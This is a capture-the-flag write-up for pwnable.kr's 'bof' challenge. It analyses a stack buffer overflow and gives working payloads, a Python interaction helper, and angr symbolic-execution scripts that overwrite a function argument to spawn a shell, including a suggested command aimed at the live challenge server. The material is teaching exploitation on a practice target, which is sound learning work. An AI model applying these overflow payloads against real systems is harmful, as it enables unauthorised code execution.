pwnable.kr - bof

Posted on Jun 20, 2023

Write-up

The bof challenge is the third of the Toddler’s Bottle challenges on pwnable.kr. We’ll go over two different ways to solve it: in the first, we’ll reverse the sample, identify the buffer overflow and analyse how to exploit it; in the second, we’ll use angr to find the buffer overflow and generate the payload that triggers it.

The description of the challenge is the following:

Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?

Download : http://pwnable.kr/bin/bof

Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

This one is slightly different, as we’re not provided with a login, just an endpoint to connect to. We can already assume the bof binary is exposed on port 9000 and we must exploit it to get the flag.

Let’s start by checking the source for it:

 1#include <stdio.h>
 2#include <string.h>
 3#include <stdlib.h>
 4void func(int key){
 5	char overflowme[32];
 6	printf("overflow me : ");
 7	gets(overflowme);	// smash me!
 8	if(key == 0xcafebabe){
 9		system("/bin/sh");
10	}
11	else{
12		printf("Nah..\n");
13	}
14}
15int main(int argc, char* argv[]){
16	func(0xdeadbeef);
17	return 0;
18}

At first the code doesn’t seem to make sense: we want to reach line 9, but func is called on line 16 with 0xdeadbeef, not 0xcafebabe. To see where the program is vulnerable, let’s consider what happens on the stack when func is called:

To pass 0xdeadbeef as an argument, it is pushed onto the stack
The call instruction pushes the return address (the address of the instruction that follows the call) onto the stack
Inside func, the prologue saves the caller’s frame pointer (EBP) on the stack and sets up a new stack frame
Space is reserved for func’s local variables; in this case the only one is overflowme, which is 32 bytes long

Since the stack grows towards lower addresses, this is roughly what the stack looks like after func’s prologue (offsets are relative to the start of overflowme):

+---------+----------------------------+
| Offset  |    Content                 |
+---------+----------------------------+
| 0x00    | ... contents               |
| ...     | ... of                     |
| 0x1f    | ... overflowme             |
| 0x20    | Saved EBP                  |
| 0x24    | Saved EIP (return address) |
| 0x28    | 0xdeadbeef (key)           |
+---------+----------------------------+

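With this layout in mind, and knowing that gets only stops reading at a newline or end-of-file, we can see that a string longer than 32 bytes will overflow overflowme. According to the table, 44 bytes (40 bytes of padding followed by the 4-byte value) should let us overwrite 0xdeadbeef with the value we want. Since x86 is little-endian, 0xcafebabe has to be written as the bytes \xbe\xba\xfe\xca.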
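To make the simplified layout above concrete, here’s a small Python model of it. It’s only a sketch: it builds the frame following the four steps listed earlier, ignores canaries and compiler padding (the real binary has both, as we’ll see shortly), and uses made-up placeholder values for the saved EBP and return address. `unchecked_gets` is a hypothetical helper that, like gets, copies its input with no bounds check and appends a NUL terminator.

```python
import struct

BUF_SIZE = 32  # sizeof(overflowme)


def build_frame(key: int) -> bytearray:
    """Model func's frame as bytes, starting at overflowme (lowest address).

    The pushes grow the stack downwards, so reading upwards from overflowme
    we meet the saved EBP, then the return address, then the argument.
    """
    overflowme = bytes(BUF_SIZE)               # space reserved for the local buffer
    saved_ebp = struct.pack("<I", 0x22222222)  # placeholder saved EBP
    saved_eip = struct.pack("<I", 0x11111111)  # placeholder return address
    arg = struct.pack("<I", key)               # pushed by main before the call
    return bytearray(overflowme + saved_ebp + saved_eip + arg)


def unchecked_gets(frame: bytearray, data: bytes) -> None:
    """Write data plus gets' NUL terminator from the start of overflowme, unchecked.

    Bytes past the modelled frame would land in main's frame; here the
    bytearray simply grows.
    """
    written = data + b"\x00"
    frame[0:len(written)] = written


def read_key(frame: bytearray) -> int:
    """Read func's argument, which sits 32 + 4 + 4 = 0x28 bytes above overflowme."""
    (key,) = struct.unpack_from("<I", frame, BUF_SIZE + 8)
    return key


frame = build_frame(0xDEADBEEF)
payload = b"A" * 40 + struct.pack("<I", 0xCAFEBABE)  # 44 bytes, as described above
unchecked_gets(frame, payload)
print(hex(read_key(frame)))  # 0xcafebabe
```

In this model a 31-byte input (plus the NUL) stays inside overflowme and leaves the key untouched, while anything past 40 bytes starts overwriting it.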

If we try to send a payload like that:

$ python3 -c 'import sys; sys.stdout.buffer.write(b"A"*40 + b"\xbe\xba\xfe\xca")' | ./bof
overflow me : 
Nah..
*** stack smashing detected ***: terminated
Aborted (core dumped)

… We fail, but the program does detect the stack smashing. Let’s dig a little deeper to understand why we’re failing.

Starting with the *** stack smashing detected ***: terminated message: it appears because the program was compiled with stack canaries. A canary is simply a (mostly) random value placed on the stack right after the function prologue. Before the epilogue, the function checks whether the canary was tampered with; if it was, __stack_chk_fail is called, which prints the error message and aborts. The following image shows in blue where the canary is used. We can see that it is read from offset 0x14 of the gs segment (gs:0x14).
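A toy model makes the canary check concrete, and incidentally shows why the first attempt printed Nah.. before aborting. It’s a sketch under assumptions: the canary is a 4-byte random value placed directly above overflowme with no extra padding (the real layout differs, as we’ll see next), the saved registers are placeholders, and `stack_chk` is a hypothetical stand-in for the comparison the epilogue performs before calling __stack_chk_fail.

```python
import os
import struct

BUF_SIZE = 32


def frame_with_canary(key: int):
    """Return (frame, canary) laid out as overflowme | canary | saved EBP | saved EIP | key."""
    canary = os.urandom(4)  # fresh random value, standing in for the one read from gs:0x14
    frame = bytearray(
        bytes(BUF_SIZE)
        + canary
        + struct.pack("<I", 0x22222222)  # placeholder saved EBP
        + struct.pack("<I", 0x11111111)  # placeholder return address
        + struct.pack("<I", key)
    )
    return frame, canary


def stack_chk(frame: bytearray, canary: bytes) -> None:
    """Epilogue check: abort if the canary slot no longer holds the original value."""
    if bytes(frame[BUF_SIZE:BUF_SIZE + 4]) != canary:
        raise RuntimeError("*** stack smashing detected ***: terminated")


frame, canary = frame_with_canary(0xDEADBEEF)
# The first payload (40 bytes of padding + 0xcafebabe), written from overflowme up.
payload = b"A" * 40 + struct.pack("<I", 0xCAFEBABE)
frame[0:len(payload)] = payload

print(hex(struct.unpack_from("<I", frame, BUF_SIZE + 12)[0]))  # key is still 0xdeadbeef
try:
    stack_chk(frame, canary)
except RuntimeError as err:
    print(err)
```

With the extra 4-byte slot in the way, our 0xcafebabe lands on the modelled return address instead of the key, so the comparison still fails (Nah..) and the overwritten canary then triggers the abort, matching the output we saw.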

Looking at the rest of the assembly, we can see in orange that the function allocates 0x48 bytes for its local stack frame. This might seem odd, given that the source code has only one local variable (overflowme), but the compiler also reserves space for padding and alignment. Another relevant factor is that the calling convention is cdecl: arguments are passed on the stack and cleaned up by the caller. gets takes a pointer to the destination buffer (char *) as its argument, which we can see in red: the address of overflowme is placed at the top of the stack right before gets is called.

Taking all of this into account, and looking at the stack layout at the beginning of the image, we know that overflowme starts 0x30 bytes below the return address: overflowme itself takes 0x20 bytes, the canary and its padding take 0xC, and the saved EBP takes 0x4. We need 0x30 bytes to reach the return address and 4 more to overwrite it; only then can we place our target value, which will overwrite func’s argument. Our payload becomes:

$ python3 -c 'import sys; sys.stdout.buffer.write(b"A"*0x34 + b"\xbe\xba\xfe\xca")' | ./bof
overflow me : 
*** stack smashing detected ***: terminated
Aborted (core dumped)

Ok, so we no longer get the Nah.., which means we took the right branch, but the program still aborts. This is because of how our input is sent: when we pipe python’s output into the program, stdin reaches end of file (EOF) as soon as python exits. The spawned /bin/sh inherits that stdin, reads EOF and exits immediately; func then returns, the canary check fails (our padding overwrote the canary), and we get the stack smashing message. To prevent this, we must keep stdin open after the payload so we can send more data. We can do that with cat <(python3 ...) - | ./bof: <(...) is bash process substitution, which exposes the output of the command inside the parentheses as a file (typically /dev/fd/N, backed by a pipe) for cat to read first, and the trailing - tells cat to then keep forwarding its own stdin, i.e. whatever we type.

Our final payload should then be:

$ cat <(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*0x34 + b"\xbe\xba\xfe\xca" + b"\x0a")') - | ./bof
overflow me : 
ls
bof bof.c

Note that we also appended b"\x0a" (a newline) to the payload: gets stops reading at a newline or EOF, so without it we’d have to press Enter ourselves to tell gets the string has ended.
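The same exploit can also be driven from Python using only the standard library. This is a minimal sketch under a few assumptions: the padding is spelled out as the sum of the sizes read from the disassembly, and `interact` is a hypothetical helper that writes the payload, pauses, sends follow-up commands and only then closes stdin. The pause is a timing heuristic: when stdin is a pipe, bof’s stdio reads it in large chunks, so commands already sitting in the pipe when gets runs would be swallowed into bof’s buffer and the spawned shell would only see EOF. Typing the commands later through cat - avoids this naturally.

```python
import struct
import subprocess
import time

# Sizes read from func's disassembly.
OVERFLOWME = 0x20
CANARY_AND_PADDING = 0xC
SAVED_EBP = 0x4
SAVED_EIP = 0x4
PADDING = OVERFLOWME + CANARY_AND_PADDING + SAVED_EBP + SAVED_EIP  # 0x34


def build_payload(key: int = 0xCAFEBABE) -> bytes:
    """Padding up to func's argument, the little-endian key, and a newline for gets."""
    return b"A" * PADDING + struct.pack("<I", key) + b"\n"


def interact(argv, payload: bytes, commands, delay: float = 0.5,
             timeout: float = 10.0) -> bytes:
    """Hypothetical helper: send payload, pause, send commands, then close stdin.

    Returns everything the process wrote to stdout and stderr.
    """
    proc = subprocess.Popen(
        argv,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    )
    proc.stdin.write(payload)
    proc.stdin.flush()
    # Timing heuristic: let the target consume the payload first, so the
    # commands stay in the pipe for the shell instead of being read into
    # bof's stdio buffer together with the payload.
    time.sleep(delay)
    follow_up = b"".join(cmd + b"\n" for cmd in commands)
    # communicate() writes the commands, closes stdin (EOF, like Ctrl-D
    # after cat -) and collects the output.
    out, _ = proc.communicate(follow_up, timeout=timeout)
    return out
```

Against the local binary this would be called as interact(["./bof"], build_payload(), [b"ls"]). For the remote service, the same keep-stdin-open idea should apply by piping the cat <(...) - command into nc pwnable.kr 9000 instead of ./bof.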

Let’s now explore how we could solve this challenge using angr, a symbolic execution framework.

Solving Using `angr`

An alternative way of solving this simple buffer overflow is to use angr. This saves us from having to find the correct payload size ourselves, letting angr do that for us.

We’ll start by taking note of the address we want to find and the address we want to avoid. If we take a look at the assembly again, our target address is 0x65d and we want to avoid 0x66b:

With this we can quickly write the following script:

import sys

import angr


def main():
    project = angr.Project('./bof')
  
    # Based on the assembly, we fetch which branch we want to hit, which one we want to avoid
    good_addr = 0x65d
    bad_addr = 0x66b

    # We create an entry_state, which makes the program run from the entry point
    init_state = project.factory.entry_state()

    # We create the simulation engine based on the initial state
    simulation = project.factory.simgr(init_state)
    # and tell it to explore states until it finds the good_addr while also avoiding the bad_addr
    simulation.explore(find=good_addr, avoid=bad_addr)

    # The found stash holds the states that reached our good_addr. If it is
    # not empty, there's at least one solution; explore() stops at the first
    # one by default (and there's only one way to reach good_addr anyway).
    if simulation.found:
        solution_state = simulation.found[0]

        # The input is passed from gets, which consumes from stdin. We must get the contents
        # of the stdin when we're in a state that reached our good_addr
        print(solution_state.posix.dumps(sys.stdin.fileno()))
    else:
        print('No solution found!')


if __name__ == '__main__':
    main()

And if we run it:

$ python solve.py 
WARNING  | angr.storage.memory_mixins.default_filler_mixin | The program is accessing register with an unspecified value. This could indicate unwanted behavior.
WARNING  | angr.storage.memory_mixins.default_filler_mixin | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by:
WARNING  | angr.storage.memory_mixins.default_filler_mixin | 1) setting a value to the initial state
WARNING  | angr.storage.memory_mixins.default_filler_mixin | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null
WARNING  | angr.storage.memory_mixins.default_filler_mixin | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to suppress these messages.
WARNING  | angr.storage.memory_mixins.default_filler_mixin | Filling register edi with 4 unconstrained bytes referenced from 0x4006b1 (__libc_csu_init+0x1 in bof (0x6b1))
WARNING  | angr.procedures.libc.gets | The use of gets in a program usually causes buffer overflows. You may want to adjust SimStateLibc.max_gets_size to properly mimic an overflowing read.
WARNING  | angr.engines.successors | Exit state has over 256 possible solutions. Likely unconstrained; skipping. <BV32 Reverse(packet_0_stdin_14_2040[1655:1624])>
WARNING  | angr.engines.successors | Exit state has over 256 possible solutions. Likely unconstrained; skipping. <BV32 Reverse(packet_0_stdin_14_2040[1655:1624])>
No solution found!

Let’s try to understand what’s happening here. First, we get a warning about an access to a register with an unspecified value. As angr suggests, we could resolve it by filling unconstrained memory and registers with zeros or with symbolic values.

We then get a warning about gets, pointing out that we can set the maximum number of symbolic bytes created by a call to gets (SimStateLibc.max_gets_size).

Finally, there are two warnings about exit states with over 256 possible solutions, which angr considers unconstrained and therefore skips.

All of this results in no solution being found. So how can we address it?

We can ignore the warning about unspecified values, as our interest is in the value of the stdin pipe. If we really want to mute these warnings, we can create the state with the following options:

init_state = project.factory.entry_state(add_options={
	angr.options.ZERO_FILL_UNCONSTRAINED_MEMORY,
	angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS
})

We are not very concerned about the second warning either, but if we wanted to change the maximum number of symbolic bytes created by gets, we could use:

init_state.libc.max_gets_size = 0x40

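The last two messages, about the 256 possible solutions, are our main issue. Both branches (the one calling system and the one printing Nah..) eventually reach func’s ret, which loads EIP from bytes that came from gets. Because those bytes are symbolic, the jump target is unconstrained: there is no concrete next state to move to, so angr drops both states. Our find and avoid addresses never caught them because angr loads this position-independent binary at base 0x400000 (note how the first warning reports offset 0x6b1 at 0x4006b1), so 0x65d and 0x66b are never executed as such; they would have to be rebased to 0x40065d and 0x40066b to match.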

There are multiple ways to address this, and the one we’ll use is the following: instead of passing find and avoid addresses to explore, we’ll pass a lambda as find, so exploration stops as soon as a state’s stdin contains the bytes \xbe\xba\xfe\xca (0xcafebabe in little-endian). Once a state has taken the key == 0xcafebabe branch, the solver has no choice but to place those bytes in stdin. The script becomes:

import sys

import angr


def main():
    project = angr.Project('./bof')
  
    # We create an entry_state, which makes the program run from the entry point
    init_state = project.factory.entry_state(add_options={
        angr.options.ZERO_FILL_UNCONSTRAINED_MEMORY,
        angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS
    })

    # We create the simulation engine based on the initial state
    simulation = project.factory.simgr(init_state)
    # and tell it to explore until a state's stdin contains 0xcafebabe (little-endian)
    simulation.explore(find=lambda s: b'\xbe\xba\xfe\xca' in s.posix.dumps(sys.stdin.fileno()))

    # The found stash holds the states that satisfied the find predicate.
    # If it is not empty, there's at least one solution.
    if simulation.found:
        solution_state = simulation.found[0]

        # The input is passed from gets, which consumes from stdin. We must get the contents
        # of the stdin
        stdin = solution_state.posix.dumps(sys.stdin.fileno())
        print(stdin)
        overflow_bytes = stdin.find(b'\xbe\xba\xfe\xca')
        print(f'Bytes to overflow: {hex(overflow_bytes)}')
    else:
        print('No solution found!')


if __name__ == '__main__':
    main()

If we now run this script:

$ python solve.py 
WARNING  | angr.procedures.libc.gets | The use of gets in a program usually causes buffer overflows. You may want to adjust SimStateLibc.max_gets_size to properly mimic an overflowing read.
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbe\xba\xfe\xca\x00\x00\x00\x00\x00\x00\x00'
Bytes to overflow: 0x34

And here we have it, we’ve reached the same value as before: we need 0x34 bytes followed by 0xcafebabe to reach the branch we want.
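The zero bytes angr chose for padding work just as well as our "A"s, since gets copies null bytes like any other byte and only stops at a newline or EOF. Here’s a small sketch of turning angr’s stdin dump into a payload; `angr_stdin` is reconstructed by hand from the output above rather than produced by angr, and trimming everything after the key is our choice to keep the payload minimal.

```python
import struct

# Reconstructed from the solve.py output above: 0x34 zero bytes, the key, 7 more zero bytes.
angr_stdin = b"\x00" * 0x34 + b"\xbe\xba\xfe\xca" + b"\x00" * 7

key = struct.pack("<I", 0xCAFEBABE)
offset = angr_stdin.find(key)
# Keep everything up to and including the key, then terminate the gets call.
payload = angr_stdin[: offset + len(key)] + b"\n"

print(hex(offset))   # 0x34
print(len(payload))  # 57
```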

Conclusion

We went over two different approaches to solving this challenge, which made the post longer than it needed to be, but it gave us a better understanding of how angr can be used to tackle more specific problems.
